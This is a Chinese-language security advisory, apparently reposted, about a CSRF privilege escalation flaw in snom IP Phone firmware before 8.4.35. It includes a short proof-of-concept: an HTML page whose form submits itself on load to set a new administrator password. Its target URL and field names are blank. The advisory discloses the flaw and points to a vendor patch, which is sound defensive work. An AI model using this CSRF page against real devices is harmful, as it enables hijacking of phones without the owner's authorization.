snom IP Phone 8.4.35之前版本权限提升漏洞

发布日期:2012-02-23
更新日期:2012-02-24

受影响系统:
Snom IP Phone < 8.4.35
描述:
--------------------------------------------------------------------------------
Snom是德国的一家VoIP电话厂商。

snom IP Phone在实现上存在安全漏洞,管理员登录表格与重置管理密码表格相同,无需输入旧密码即可更改密码,导致跨站请求伪造,从而提升权限。

<*来源:Nathaniel Carew
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Nathaniel Carew ()提供了如下测试方法:

<?php echo htmlentities('<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=" "
method="POST">
<input type="text" value="on">
<input type="text" value="newpass">
<input type="text" value="newpass">
<input type="text" value="save">
</form>
</body><br>
</html>'); ?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Snom
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwdgzg.html